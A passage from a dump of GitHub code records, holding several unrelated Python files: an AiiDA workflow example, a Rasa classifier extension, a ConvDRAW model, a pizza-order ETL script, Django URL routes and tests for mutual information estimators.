type=cmdline.params.types.CodeParamType())\n@click.option('--ddec_code', type=cmdline.params.types.CodeParamType())\n@click.argument('ddec_atdens_path')\ndef main(zeopp_code, cp2k_code, ddec_code, ddec_atdens_path):\n \"\"\"Example usage:\n ATDENS_PATH='/home/daniele/Programs/aiida-database/data/chargemol_09_26_2017/atomic_densities/'\n verdi run 
run_ZeoppMultistageDdecWorkChain_H2O.py zeopp@localhost cp2k@localhost ddec@localhost $ATDENS_PATH\n \"\"\"\n\n cp2k_options = {\n 'resources': {\n 'num_machines': 1\n },\n 'max_wallclock_seconds': 10 * 60,\n 'withmpi': True,\n }\n\n ddec_options = {\n 'resources': {\n 'num_machines': 1\n },\n 'max_wallclock_seconds': 10 * 60,\n 'withmpi': False,\n }\n\n zeopp_options = {\n 'resources': {\n 'num_machines': 1\n },\n 'max_wallclock_seconds': 10 * 60,\n 'withmpi': False,\n }\n\n ddec_params = Dict(\n dict={\n 'net charge': 0.0,\n 'charge type': 'DDEC6',\n 'periodicity along A, B, and C vectors': [True, True, True],\n 'compute BOs': False,\n 'atomic densities directory complete path': ddec_atdens_path,\n 'input filename': 'valence_density',\n })\n\n zeopp_params = NetworkParameters(\n dict={\n 'ha': 'DEF', # Using high accuracy (mandatory!)\n 'res': True, # Max included, free and incl in free sphere\n 'sa': [1.86, 1.86, 1000], # Nitrogen probe to compute surface\n 'vol': [0.0, 0.0, 1000], # Geometric pore volume\n })\n\n structure = CifData(file=os.path.join(os.getcwd(), 'data/H2O.cif')).store()\n structure.label = 'H2O'\n\n inputs = {\n 'structure': structure,\n 'protocol_tag': Str('test'),\n 'metadata': {\n 'label': 'test',\n },\n 'cp2k_base': {\n 'cp2k': {\n 'code': cp2k_code,\n 'metadata': {\n 'options': cp2k_options,\n }\n }\n },\n 'ddec': {\n 'parameters': ddec_params,\n 'code': ddec_code,\n 'metadata': {\n 'options': ddec_options,\n }\n },\n 'zeopp': {\n 'parameters': zeopp_params,\n 'code': zeopp_code,\n 'metadata': {\n 'options': zeopp_options,\n }\n }\n }\n\n run(ZeoppMultistageDdecWorkChain, **inputs)\n\n\nif __name__ == '__main__':\n main() # pylint: disable=no-value-for-parameter\n","repo_name":"mbercx/aiida-lsmo","sub_path":"examples/run_ZeoppMultistageDdecWorkChain_H2O.py","file_name":"run_ZeoppMultistageDdecWorkChain_H2O.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"39261368613","text":"import rasa.utils.common as common_utils\nfrom rasa.nlu.classifiers.diet_classifier import DIETClassifier\nfrom rasa.constants import DOCS_URL_TRAINING_DATA_NLU\nfrom rasa.nlu.training_data import TrainingData\nfrom rasa.nlu.constants import (\n ENTITIES,\n TOKENS_NAMES,\n TEXT,\n ENTITY_ATTRIBUTE_START,\n ENTITY_ATTRIBUTE_END,\n INTENT,\n)\n\n\nclass DIETClassifierCustom(DIETClassifier):\n @staticmethod\n def check_correct_entity_annotations(training_data: TrainingData) -> None:\n \"\"\"Check if entities are correctly annotated in the training data.\n If the start and end values of an entity do not match any start and end values\n of the respected token, we define an entity as misaligned and log a warning.\n Args:\n training_data: The training data.\n \"\"\"\n for example in training_data.entity_examples:\n entity_boundaries = [\n (entity[ENTITY_ATTRIBUTE_START], entity[ENTITY_ATTRIBUTE_END])\n for entity in example.get(ENTITIES)\n ]\n token_start_positions = [\n t.start for t in example.get(TOKENS_NAMES[TEXT], [])\n ]\n token_end_positions = [t.end for t in example.get(TOKENS_NAMES[TEXT], [])]\n\n for entity_start, entity_end in entity_boundaries:\n if (\n entity_start not in token_start_positions\n or entity_end not in token_end_positions\n ):\n common_utils.raise_warning(\n f\"Misaligned entity annotation in message '{example.text}' \"\n f\"with intent '{example.get(INTENT)}'. Make sure the start and \"\n f\"end values of entities in the training data match the token \"\n f\"boundaries (e.g. 
entities don't include trailing whitespaces \"\n f\"or punctuation).\",\n docs=DOCS_URL_TRAINING_DATA_NLU,\n )\n break\n","repo_name":"weni-ai/bothub-nlp","sub_path":"bothub/shared/utils/pipeline_components/diet_classifier.py","file_name":"diet_classifier.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"20430220049","text":"import torch\nfrom torch import nn\nfrom torch.distributions import Normal, kl_divergence\n\nfrom .conv_lstm import Conv2dLSTMCell\n\nuse_gpu = torch.cuda.is_available()\ndevice = torch.device('cuda' if use_gpu else 'cpu')\n\n\nclass ConvDraw(nn.Module):\n \"\"\"\n Towards Conceptual Compression\n - https://arxiv.org/pdf/1604.08772.pdf\n \"\"\"\n\n def __init__(self,\n xdim,\n height,\n width,\n hdim,\n zdim,\n read_size=5,\n write_size=5,\n glimpse=10,\n *args,\n **kwargs):\n super(ConvDraw, self).__init__()\n self.xdim = xdim\n self.hdim = hdim\n self.zdim = zdim\n\n self.T = glimpse\n\n self.encoder = Conv2dLSTMCell(xdim + xdim + hdim, hdim, read_size)\n self.decoder = Conv2dLSTMCell(zdim + xdim, hdim, write_size)\n\n self.prior = nn.Conv2d(hdim,\n zdim * 2,\n kernel_size=5,\n stride=1,\n padding=2)\n self.posterior = nn.Conv2d(hdim,\n zdim * 2,\n kernel_size=5,\n stride=1,\n padding=2)\n\n self.upsampler = nn.Conv2d(hdim, xdim, kernel_size=1, stride=1)\n\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight,\n mode='fan_out',\n nonlinearity='relu')\n if hasattr(m.weight, 'bias') and m.weight.bias is not None:\n nn.init.constant_(m.weight.bias, 0)\n\n def forward(self, x):\n hdim, T = self.hdim, self.T\n batch, d, h, w = x.shape\n\n canvas = x.new_zeros((batch, d, h, w))\n\n c_enc = x.new_zeros((batch, hdim, h, w))\n h_enc = x.new_zeros((batch, hdim, h, w))\n\n c_dec = x.new_zeros((batch, hdim, h, w))\n h_dec = x.new_zeros((batch, hdim, h, w))\n\n kl = 0\n for t in range(T):\n eps = x - torch.sigmoid(canvas)\n\n c_enc, h_enc = self.encoder(torch.cat([x, eps, h_dec], dim=1),\n (c_enc, h_enc))\n\n # Prior\n p_mu, p_logvar = torch.chunk(self.prior(h_dec), 2, dim=1)\n p = Normal(p_mu, p_logvar.mul(0.5).exp())\n\n # Posterior\n q_mu, q_logvar = torch.chunk(self.posterior(h_enc), 2, dim=1)\n q = Normal(q_mu, q_logvar.mul(0.5).exp())\n\n # Sample\n z = q.rsample()\n\n c_dec, h_dec = self.decoder(torch.cat([z, canvas], dim=1),\n (c_dec, h_dec))\n\n current = self.upsampler(h_dec)\n canvas = canvas + current\n kl += kl_divergence(q, p)\n\n kl = torch.mean(torch.sum(kl, dim=[1, 2, 3]))\n\n return torch.sigmoid(canvas.view(x.shape)), kl\n","repo_name":"jihoonl/VAEs","sub_path":"models/conv_draw.py","file_name":"conv_draw.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31757877304","text":"import pandas as pd\nimport re\nimport os\nimport requests\nimport plotly.graph_objects as go\n\nfrom calidad_datos import main as analisis\nfrom transformacion_datos import etl as transformar\nfrom xml.etree.ElementTree import Element, ElementTree, SubElement\nfrom reporte import crear_presentacion\nfrom plantilla_excel import make_excel\n\n\nERROR = 4\n\n\ndef df_to_dict(dicc):\n\n tmp = {}\n\n for clave in dicc['Nº esperado'].keys():\n\n ingrediente = dicc['Ingrediente'][clave]\n\n ingrediente = re.sub(' ', '_', ingrediente)\n\n if ingrediente == '‘Nduja_Salami':\n ingrediente = 
'Nduja_Salami'\n\n tmp[ingrediente] = dicc['Nº esperado'][clave]\n\n return tmp\n\n\ndef dict_to_xml(tag, d):\n\n elem = Element(tag)\n\n pedidos = SubElement(elem, 'Pedidos')\n\n ingredientes = SubElement(elem, 'Ingredientes')\n\n for key, val in d.items():\n\n if key != 'Pedidos':\n\n child = SubElement(ingredientes, 'Ingrediente', name=key, cantidad=str(val))\n\n else:\n\n child = SubElement(pedidos, 'Pedidos', cantidad=str(val))\n\n return elem\n\n\ndef crear_imagen(imag_name, x, y, color=None, customscale=None):\n\n fig = go.Figure()\n if customscale is not None:\n fig.add_trace(go.Bar(x=x, y=y, marker=dict(color=color, colorscale=customscale)))\n\n elif color is not None:\n fig.add_trace(go.Bar(x=x, y=y, marker=dict(color=color)))\n\n else:\n fig.add_trace(go.Bar(x=x, y=y))\n\n fig.write_image(f\"imagenes/{imag_name}\")\n\n\ndef crear_imagenes(df_ingredientes: pd.DataFrame, df_pizzas: pd.DataFrame, dicc: dict):\n\n contador = False\n for file in os.scandir('./'):\n if file.name == 'imagenes' and not contador:\n contador = True\n logo = False\n\n if not contador:\n os.mkdir('imagenes')\n\n for imagen in os.scandir('./imagenes/'):\n if imagen.name == 'logo.png' and not logo:\n logo = True\n\n if not logo:\n imagen = requests.get('https://img1.wsimg.com/isteam/ip/5a78177b-0605-4ae4-9d2a-c96dfa5cccbd/logo/9609391e-6d81-4d26-8a42-0d9aa201a919.jpg/:/rs=h:160/qt=q:95.png')\n code = open('./imagenes/logo.png', 'wb')\n code.write(imagen.content)\n\n dicc_sem = df_ingredientes.to_dict()\n\n ingredientes = []\n cantidades = []\n i = 0\n for value in dicc_sem.values():\n if not i:\n for value2 in value.values():\n i += 1\n if i > 1:\n ingredientes.append(value2)\n else:\n for value2 in value.values():\n cantidades.append(value2)\n\n cantidades.pop(0)\n\n crear_imagen('ingredientes.png', x=ingredientes, y=cantidades)\n\n dicc_sem1 = df_pizzas[['pizza_type_id', 'Pedidos']].to_dict()\n\n pizzas = []\n pedidos = []\n\n for i in range(len(dicc_sem1['Pedidos']) - 1):\n\n pizzas.append(dicc_sem1['pizza_type_id'][i])\n pedidos.append(dicc_sem1['Pedidos'][i])\n\n crear_imagen('tipo_pedidos.png', x=pizzas, y=cantidades)\n\n maximo = [0]*5\n mayores = [0]*5\n\n minimo = [10000]*5\n menores = [0]*5\n\n for i in range(len(dicc_sem1['Pedidos']) - 1):\n\n cantidad = dicc_sem1['Pedidos'][i]\n pizza = dicc_sem1['pizza_type_id'][i]\n\n for max in range(5):\n\n if maximo[max] < cantidad and pizza not in mayores:\n\n maximo[max] = cantidad\n mayores[max] = pizza\n\n for min in range(5):\n\n if minimo[min] > cantidad and pizza not in menores:\n\n minimo[min] = cantidad\n menores[min] = pizza\n\n z1 = [max for max in maximo]\n z2 = [min for min in minimo]\n\n customscale = [\n [0, \"rgb(128, 64, 0)\"],\n [0.1, \"rgb(205, 127, 50)\"],\n [0.25, \"rgb (128,128,128)\"],\n [1.0, \"rgb(255, 215, 0)\"]\n ]\n\n crear_imagen('mejores_pizzas.png', x=mayores, y=maximo, color=z1, customscale=customscale)\n\n crear_imagen('peores_pizzas.png', x=menores, y=minimo, color=z2, customscale=customscale)\n\n ficheros = []\n valores = []\n for value in dicc.values():\n valor = 0\n for value2 in value['Contenidos'].values():\n valor += int(value2['Valores_Null_Nan'])\n\n ficheros.append(value['Nombre_fichero'])\n valores.append(valor)\n\n crear_imagen('analisis_datos.png', x=ficheros, y=valores, color='red')\n\n return\n\n\ndef aproximar_numero(numero: float):\n '''\n Aproxima un número, añadiéndole un margen de error\n '''\n\n global ERROR\n\n return int(round(numero) + ERROR)\n\n\ndef extract(semana: int):\n '''\n Recoge los datos del 
csv correspondiente a esa semana.\n sino, llamará a la anterior ETL\n '''\n\n nombre_csv = 'csv_procesado_semana' + str(semana) + '.csv'\n\n # Lo primero será ver si existe el archivo\n try:\n\n return pd.read_csv(f'./datasets/{nombre_csv}')\n\n # Sino, nos tocará extraer los datos de la otra ETL\n except FileNotFoundError:\n\n try:\n\n dataframe = transformar(semana)\n\n return dataframe\n\n except Exception as ex:\n\n print(f'Fallo causado por la excepcion {ex}')\n\n return False\n\n\ndef transform(dataframe: pd.DataFrame):\n '''\n Dividimos el dataframe por semanas\n '''\n\n if isinstance(dataframe, pd.DataFrame):\n\n df_ingredientes = dataframe.tail(1)\n\n df_ingredientes.pop('pizza_type_id')\n df_ingredientes.pop('size')\n\n df_ingredientes = df_ingredientes.apply(aproximar_numero)\n\n df_ingredientes = pd.DataFrame(df_ingredientes)\n df_ingredientes = df_ingredientes.rename(columns={'Unnamed: 0': 'Ingrediente', 0: 'Nº esperado'})\n\n return df_ingredientes, dataframe\n\n else:\n\n return False\n\n\ndef load(df: pd.DataFrame, df_pedidos: pd.DataFrame, dicc: dict, nombre: str):\n '''\n Guardaremos los ingredientes a comprar en un csv\n De igual manera, los imprimiremos por pantalla\n '''\n if isinstance(df, pd.DataFrame):\n\n conclusiones = False\n for file in os.scandir('./'):\n\n if file.name == 'conclusiones' and not conclusiones:\n conclusiones = True\n\n if not conclusiones:\n\n os.mkdir('conclusiones')\n\n df.to_csv(f'./conclusiones/{nombre}.csv')\n\n make_excel(df_pedidos, df, nombre)\n\n print(df)\n mensaje = f'Para más informacion, vaya a los siguientes archivos: '\n mensaje += f'{nombre}.csv, {nombre}.xlm, {nombre}.pdf, {nombre}.xlsx'\n print(mensaje)\n\n df = pd.read_csv(f'./conclusiones/{nombre}.csv')\n df = df.rename(columns={'Unnamed: 0': 'Ingrediente'})\n tmp = df.to_dict()\n\n tmp = df_to_dict(tmp)\n\n archivo = dict_to_xml(\n 'Semana_' +\n re.sub('ingredientes_semana', '', nombre), tmp)\n\n ElementTree(archivo).write(f'./conclusiones/{nombre}.xml')\n\n crear_imagenes(df, df_pedidos, dicc)\n\n crear_presentacion(nombre, re.search('\\d+', nombre).group())\n\n return df\n\n else:\n return False\n\n\ndef main(semana=-1):\n '''\n Ejecuta todo el programa en el siguiente orden:\n 1) Hace un análisis de los datos > analisis_datos.txt\n 2) Extrae los datos de otra ETL, que filtra los datos segun los meses\n indicados, guardando los pedidos (pizzas e ingredientes) en ese periodo\n 3) Realiza un prediccion para ese mismo mes, semana por semana\n '''\n dicc = analisis()\n\n while 52 <= semana or semana < 0:\n try:\n semana = int(input('Inserte numero de semana del año: '))\n\n except ValueError:\n semana = -1\n\n nombre = 'ingredientes_semana' + str(semana)\n\n return load(*transform(extract(semana)), dicc, nombre)\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"Pere-03/Maven_pizza_2016","sub_path":"predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33351570429","text":"from django.conf.urls import url\nfrom main import views\n\nurlpatterns = [\n url(r'^serve/journal/list/$', views.serve_journal_list),\n url(r'^store/name/and/number/$', views.store_name_and_number),\n url(r'^serve/purpose/of/trees/$', views.serve_purpose_of_trees),\n url(r'^store/subscriber/$', views.store_subscriber),\n url(r'^get/user/type/$', views.get_user_type),\n url(r'^update/need/pdf/$', views.update_need_pdf),\n url(r'^get/user/detail/$', 
views.get_user_detail),\n url(r'^login/$', views.login),\n url(r'^serve/subscribers/list/$', views.serve_subscribers_list),\n url(r'^logout/$', views.logout),\n url(r'^store/email/$', views.store_email),\n # url(r'^/update/profile/$', views.update_profile),\n url(r'^serve/profile/data/$', views.serve_profile_data),\n url(r'^$', views.admin_login),\n url(r'^register/user/$', views.register_user),\n url(r'^update_user/$', views.update_user),\n url(r'^update_user_profile$', views.update_user_profile),\n url(r'^new/journal/$', views.new_journal),\n url(r'^remove_journal/$', views.remove_journal),\n url(r'^update/status/active/$', views.update_status_active),\n url(r'^update/status/inactive/$', views.update_status_inactive),\n url(r'^print/labels/$', views.print_labels),\n \n \n]\n","repo_name":"Ruban14/CDP-Journal-admin","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15388151306","text":"from copy import deepcopy\nfrom typing import Tuple, Dict, Type, Any\n\nimport numpy as np\nimport torch\nfrom torch.optim import Optimizer, Adam\nfrom pyro.distributions.transforms import conditional_affine_coupling\nfrom torch.utils.data import DataLoader\n\nfrom torch_mist.data.multivariate import JointMultivariateNormal\nfrom torch_mist.distributions import conditional_transformed_normal\nfrom torch_mist.distributions.normal import ConditionalStandardNormalModule\nfrom torch_mist.distributions.transforms import (\n ConditionalTransformedDistributionModule,\n permute,\n)\nfrom torch_mist.estimators import (\n MIEstimator,\n instantiate_estimator,\n CLUB,\n BA,\n MultiMIEstimator,\n js,\n flip_estimator,\n doe,\n nwj,\n pq,\n)\nfrom torch_mist.estimators.discriminative import DiscriminativeMIEstimator\nfrom torch_mist.estimators.hybrid import (\n ResampledHybridMIEstimator,\n ReweighedHybridMIEstimator,\n PQHybridMIEstimator,\n)\nfrom torch_mist.quantization import (\n FixedQuantization,\n vqvae_quantization,\n kmeans_quantization,\n)\nfrom torch_mist.utils.data import DistributionDataLoader, SampleDataset\n\nfrom torch_mist.utils.evaluation import evaluate_mi\nfrom torch_mist.utils.train.mi_estimator import train_mi_estimator\n\n\nrho = 0.9\nx_dim = y_dim = 1\nbatch_size = 64\nn_bins = 32\nneg_samples = 16\nmax_epochs = 1\n\noptimizer_params = {\"lr\": 1e-3}\noptimizer_class = Adam\nn_train_samples = 100000\nn_test_samples = 10000\nn_pretrain_epochs = 3\nhidden_dims = [64]\noutput_dim = 64\nquantization_dim = 4\natol = 1e-1\n\n\ndef _make_data() -> (\n Tuple[\n Dict[str, torch.Tensor],\n Dict[str, torch.Tensor],\n torch.Tensor,\n torch.Tensor,\n ]\n):\n p_xy = JointMultivariateNormal(sigma=1, rho=rho, n_dim=1)\n true_mi = p_xy.mutual_information()\n entropy_y = p_xy.entropy(\"y\")\n\n train_samples = p_xy.sample([n_train_samples])\n test_samples = p_xy.sample([n_test_samples])\n\n return train_samples, test_samples, true_mi, entropy_y\n\n\ndef _test_estimator(\n estimator: MIEstimator,\n train_samples: Dict[str, torch.Tensor],\n test_samples: Dict[str, torch.Tensor],\n true_mi: torch.Tensor,\n optimizer_params: Dict[str, Any],\n optimizer_class: Type[Optimizer],\n atol: float = 1e-1,\n):\n # Train the estimator\n train_mi_estimator(\n estimator=estimator,\n x=train_samples[\"x\"],\n y=train_samples[\"y\"],\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n max_epochs=max_epochs,\n lr_annealing=False,\n batch_size=batch_size,\n 
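# NOTE (added comment, assumption about intent, not from the original author):\n # lr_annealing stays off so every estimator trains under the same fixed\n # Adam settings, keeping the comparison uniform.\n 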
verbose=False,\n )\n\n # Compute the estimate\n mi_estimate = evaluate_mi(\n estimator,\n x=test_samples[\"x\"],\n y=test_samples[\"y\"],\n batch_size=batch_size,\n )\n\n print(\"True I(x;y): \", true_mi)\n print(\"Estimated I(x;y): \", mi_estimate)\n\n # Check that the estimate is close to the true value\n assert np.isclose(\n mi_estimate, true_mi, atol=atol\n ), f\"Estimate {mi_estimate} is not close to true value {true_mi}.\"\n\n\ndef test_discriminative_estimators():\n # Seed everything\n np.random.seed(0)\n torch.manual_seed(0)\n\n train_samples, test_samples, true_mi, _ = _make_data()\n\n estimators = [\n instantiate_estimator(\n estimator_name=\"nwj\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n flip_estimator(\n instantiate_estimator(\n estimator_name=\"nwj\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n )\n ),\n instantiate_estimator(\n estimator_name=\"infonce\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n output_dim=output_dim,\n projection_head=\"symmetric\",\n ),\n instantiate_estimator(\n estimator_name=\"infonce\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n output_dim=output_dim,\n ),\n instantiate_estimator(\n estimator_name=\"js\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"js\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n critic_type=\"separable\",\n output_dim=output_dim,\n ),\n instantiate_estimator(\n estimator_name=\"mine\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"smile\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"tuba\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"alpha_tuba\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"alpha_tuba\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n learnable_baseline=False,\n ),\n instantiate_estimator(\n estimator_name=\"flo\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n ]\n\n for estimator in estimators:\n print(estimator)\n _test_estimator(\n estimator=estimator,\n train_samples=train_samples,\n test_samples=test_samples,\n true_mi=true_mi,\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n atol=atol,\n )\n\n\ndef test_generative_estimators():\n # Seed everything\n np.random.seed(0)\n torch.manual_seed(0)\n\n train_samples, test_samples, true_mi, entropy_y = _make_data()\n\n estimators = [\n instantiate_estimator(\n estimator_name=\"ba\",\n x_dim=x_dim,\n y_dim=y_dim,\n entropy_y=entropy_y,\n hidden_dims=hidden_dims,\n transform_name=\"conditional_linear\",\n n_transforms=1,\n ),\n instantiate_estimator(\n estimator_name=\"doe\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n conditional_transform_name=\"conditional_linear\",\n n_conditional_transforms=1,\n marginal_transform_name=\"linear\",\n n_marginal_transforms=1,\n ),\n instantiate_estimator(\n estimator_name=\"gm\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n joint_transform_name=\"spline_autoregressive\",\n n_joint_transforms=2,\n 
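# NOTE (added comment, assumption, not from the original author): the joint\n # density gets the expressive autoregressive spline flow while the\n # marginals below stay linear.\n 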
marginal_transform_name=\"linear\",\n n_marginal_transforms=1,\n ),\n instantiate_estimator(\n estimator_name=\"l1out\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n transform_name=\"conditional_linear\",\n n_transforms=1,\n ),\n instantiate_estimator(\n estimator_name=\"club\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n transform_name=\"conditional_linear\",\n n_transforms=1,\n ),\n ]\n\n for estimator in estimators:\n print(estimator)\n _test_estimator(\n estimator=estimator,\n train_samples=train_samples,\n test_samples=test_samples,\n true_mi=true_mi,\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n atol=atol if not isinstance(estimator, CLUB) else 10,\n )\n\n\ndef test_quantized_mi_estimators():\n # Seed everything\n np.random.seed(0)\n torch.manual_seed(0)\n\n train_samples, test_samples, true_mi, _ = _make_data()\n\n quantizations = [\n FixedQuantization(\n input_dim=x_dim, thresholds=torch.linspace(-3, 3, n_bins - 1)\n ),\n vqvae_quantization(\n data=train_samples[\"x\"],\n input_dim=x_dim,\n hidden_dims=hidden_dims,\n quantization_dim=quantization_dim,\n n_bins=n_bins,\n max_epochs=n_pretrain_epochs,\n batch_size=batch_size,\n ),\n vqvae_quantization(\n data=train_samples[\"x\"],\n input_dim=x_dim,\n hidden_dims=hidden_dims,\n quantization_dim=quantization_dim,\n n_bins=n_bins,\n batch_size=batch_size,\n beta=0.01,\n ),\n ]\n\n estimators = [\n instantiate_estimator(\n estimator_name=\"pq\",\n x_dim=x_dim,\n hidden_dims=hidden_dims,\n Q_y=quantization,\n )\n for quantization in quantizations\n ]\n estimators += [\n instantiate_estimator(\n estimator_name=\"binned\", Q_x=quantization, Q_y=quantization\n )\n for quantization in quantizations\n ]\n\n for estimator in estimators:\n print(estimator)\n _test_estimator(\n estimator=estimator,\n train_samples=train_samples,\n test_samples=test_samples,\n true_mi=true_mi,\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n atol=atol,\n )\n\n\ndef test_hybrid_estimators():\n # Seed everything\n np.random.seed(0)\n torch.manual_seed(0)\n\n train_samples, test_samples, true_mi, entropy_y = _make_data()\n q_Y_given_X = conditional_transformed_normal(\n input_dim=y_dim,\n context_dim=x_dim,\n hidden_dims=hidden_dims,\n scale=(1 - rho**2) ** 0.1 + 0.1,\n )\n\n generative_estimator = doe(\n x_dim=x_dim,\n y_dim=y_dim,\n q_Y_given_X=q_Y_given_X,\n marginal_transform_name=\"linear\",\n )\n\n discriminative_estimator = nwj(\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n )\n\n pq_estimator = pq(\n x_dim=x_dim,\n Q_y=kmeans_quantization(train_samples[\"y\"], n_bins=n_bins),\n hidden_dims=hidden_dims,\n temperature=1,\n )\n\n estimators = [\n ResampledHybridMIEstimator(\n generative_estimator=deepcopy(generative_estimator),\n discriminative_estimator=deepcopy(discriminative_estimator),\n ),\n ReweighedHybridMIEstimator(\n generative_estimator=deepcopy(generative_estimator),\n discriminative_estimator=deepcopy(discriminative_estimator),\n ),\n PQHybridMIEstimator(\n pq_estimator=pq_estimator,\n discriminative_estimator=deepcopy(discriminative_estimator),\n ),\n ]\n\n for estimator in estimators:\n print(estimator)\n _test_estimator(\n estimator=estimator,\n train_samples=train_samples,\n test_samples=test_samples,\n true_mi=true_mi,\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n atol=atol,\n )\n\n\ndef test_flow_generative():\n # Seed everything\n np.random.seed(42)\n torch.manual_seed(42)\n\n input_dim = 2\n\n 
p_xy = JointMultivariateNormal(n_dim=input_dim)\n true_mi = p_xy.mutual_information()\n entropy_y = p_xy.entropy(\"y\")\n\n base = ConditionalStandardNormalModule(input_dim)\n transforms = [\n conditional_affine_coupling(\n input_dim=input_dim, context_dim=input_dim, hidden_dims=hidden_dims\n ),\n permute(input_dim),\n conditional_affine_coupling(\n input_dim=input_dim, context_dim=input_dim, hidden_dims=hidden_dims\n ),\n permute(input_dim),\n conditional_affine_coupling(\n input_dim=input_dim, context_dim=input_dim, hidden_dims=hidden_dims\n ),\n ]\n transformed_dist = ConditionalTransformedDistributionModule(\n base, transforms\n )\n\n estimator = BA(\n q_Y_given_X=transformed_dist,\n entropy_y=entropy_y,\n )\n\n train_loader = DistributionDataLoader(\n joint_dist=p_xy,\n batch_size=64,\n max_samples=100000,\n )\n\n train_mi_estimator(\n estimator,\n train_loader=train_loader,\n max_epochs=5,\n verbose=False,\n )\n\n mi_estimate = evaluate_mi(estimator, dataloader=train_loader)\n\n print(\"True I(x;y): \", true_mi)\n print(\"Estimated I(x;y): \", mi_estimate)\n\n assert np.isclose(\n mi_estimate, true_mi, atol=atol\n ), f\"Estimate {mi_estimate} is not close to true value {true_mi}.\"\n\n\ndef test_multi_estimator():\n train_samples, test_samples, true_mi, entropy_y = _make_data()\n\n # Create a new de-correlated variable\n train_samples[\"z\"] = torch.roll(train_samples[\"x\"], 1, 0)\n test_samples[\"z\"] = torch.roll(test_samples[\"x\"], 1, 0)\n\n train_loader = DataLoader(\n SampleDataset(train_samples), batch_size=batch_size, num_workers=4\n )\n test_loader = DataLoader(\n SampleDataset(test_samples), batch_size=batch_size, num_workers=4\n )\n\n estimator = MultiMIEstimator(\n estimators={\n (\"x\", \"y\"): js(\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n (\"x\", \"z\"): js(\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n }\n )\n\n train_mi_estimator(\n estimator,\n train_loader=train_loader,\n max_epochs=5,\n verbose=False,\n )\n\n mi_estimate = evaluate_mi(estimator, dataloader=test_loader)\n\n assert np.isclose(\n mi_estimate[\"I(x;y)\"], true_mi, atol=atol\n ), f\"Estimate {mi_estimate} is not close to true value {true_mi}.\"\n\n assert np.isclose(\n mi_estimate[\"I(x;z)\"], 0, atol=atol\n ), f\"Estimate {mi_estimate} is not close to true value {0}.\"\n","repo_name":"mfederici/torch-mist","sub_path":"tests/test_estimators.py","file_name":"test_estimators.py","file_ext":"py","file_size_in_byte":14531,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"16594506008","text":"import pytest\nimport numpy as np\nimport tensorflow as tf\nfrom chainer import cuda, Variable\n\nfrom groupy.gconv.gconv_chainer.TransformFilter import TransformGFilter\nfrom groupy.gconv.gconv_tensorflow.transform_kernel import transform_kernel_2d_nhwc\nfrom groupy.gconv.make_gconv_indices import make_c4_z2_indices, make_c4_p4_indices,\\\n make_d4_z2_indices, make_d4_p4m_indices, make_c6_p6_indices,\\\n make_c6_z2_indices, make_d6_p6m_indices, make_d6_z2_indices\n\n\ndef tf_trans_kernel_nhwc(w, inds):\n no, ni, nti, n, _ = w.shape\n nto = inds.shape[0]\n w = w.transpose((2, 3, 4, 1, 0))\n\n wt = tf.constant(w)\n rwt = transform_kernel_2d_nhwc(wt, inds)\n\n with tf.Session() as sess:\n rwt = sess.run(rwt)\n\n rwt = rwt.transpose(3, 2, 0, 1).reshape(no, nto, ni, nti, n, 